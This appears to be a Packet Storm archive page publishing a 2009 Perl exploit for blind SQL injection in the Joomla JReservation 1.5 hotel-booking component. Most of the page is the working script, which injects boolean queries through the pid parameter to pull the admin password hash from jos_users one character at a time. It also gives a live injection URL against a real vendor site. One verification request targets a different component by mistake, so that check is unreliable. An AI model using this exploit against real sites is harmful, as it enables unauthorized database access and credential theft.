what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla JReservation 1.5 SQL Injection

Joomla JReservation 1.5 SQL Injection
Posted Sep 18, 2009
Authored by Chip D3 Bi0s

Joomla JReservation component version 1.5 remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 0138cd262fe04bc688b4acbac626c495a73ef1325339e965edac391186c52589

Joomla JReservation 1.5 SQL Injection

Change Mirror Download
#!/usr/bin/perl -w

#---------------------------------------------------------------------------------
#joomla component com_jreservation (pid) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------

#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 17 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application : JReservation Hotel Booking Component
#version : 1.5
#Developer : Can & Will
#License : GPL type : Commercial
#Date Added : 15 September 2009
#Demo : http://jforjoomla.com/cd-hotel
#Download : http://www.jforjoomla.com/Download-document.html?gid=47
#Description :

#Joomla 1.5 Jreservation Component for hotel booking system.
#Jreservation is a specially designed component for hotel owners who provides lodging
#facility & online booking for the rooms like deluxe, Air conditioned, Non Air conditioned.
#By using this Joomla 1.5 Jreservation component you can add multiple room types, amenity
#types like room amenity or property amenity. Amenity are like additional services which the
#hotel owner provides with the room e.g. Telephone, internet connection, cable connection and
#property amenity like swimming pool, gym, etc. With the help of a calender the user or a
#customer of the hotel can check rooms availability also book room as a provisional booking.

#---------------------------------------------------------------------------


#I.Blind SQL injection (pid)
#Poc/Exploit:
#~~~~~~~~~~~

#http://127.0.0.1/[path]/index.php?option=com_jreservation&task=propertycpanel&pid=X[blind]
#X: Valid pip


#Demo Live:
#~~~~~~~~~
#http://www.jforjoomla.com/cd-hotel/index.php?option=com_jreservation&task=propertycpanel&pid=1+and+1=1
#etc, etc...

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++


use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;


print "\t\t------------------------------------------------------------\n\n";
print "\t\t | Chip d3 Bi0s | \n\n";
print "\t\t JReservation Hotel Booking Component \n\n";
print "\t\t Joomla Component com_jreservation (pid) BSQL \n\n";
print "\t\t-------------------------------------------------------------\n\n";


print "http://localhost/Path : ";chomp(my $target=<STDIN>);
print " [-] Introduce pid : ";chomp($z=<STDIN>);
print " [-] Introduce coincidencia : ";chomp($w=<STDIN>);


$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";

#es Vulnerable?
$host = $target . "/index.php?option=com_jreservation&task=propertycpanel&pid=".$z."+and+1=1";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {

$host = $target . "/index.php?option=com_jlord_rss&task=feed&id=".$z."+and+1=2";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}

else

{print " [-] Vulnerable :)\n";

for ($x=1;$x<=32;$x++)
{

$host = $target . "/index.php?option=com_jreservation&task=propertycpanel&pid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32

if ($content =~ /$regexp/)
{

for ($c=97;$c<=102;$c++)

{
$host = $target . "/index.php?option=com_jreservation&task=propertycpanel&pid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;


if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}


}
else
{

for ($c=48;$c<=57;$c++)

{
$host = $target . "/index.php?option=com_jreservation&task=propertycpanel&pid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}


}

}
print " [+] Password :"." ".join('', @caracter) . "\n";
my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo :(\n";}


Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close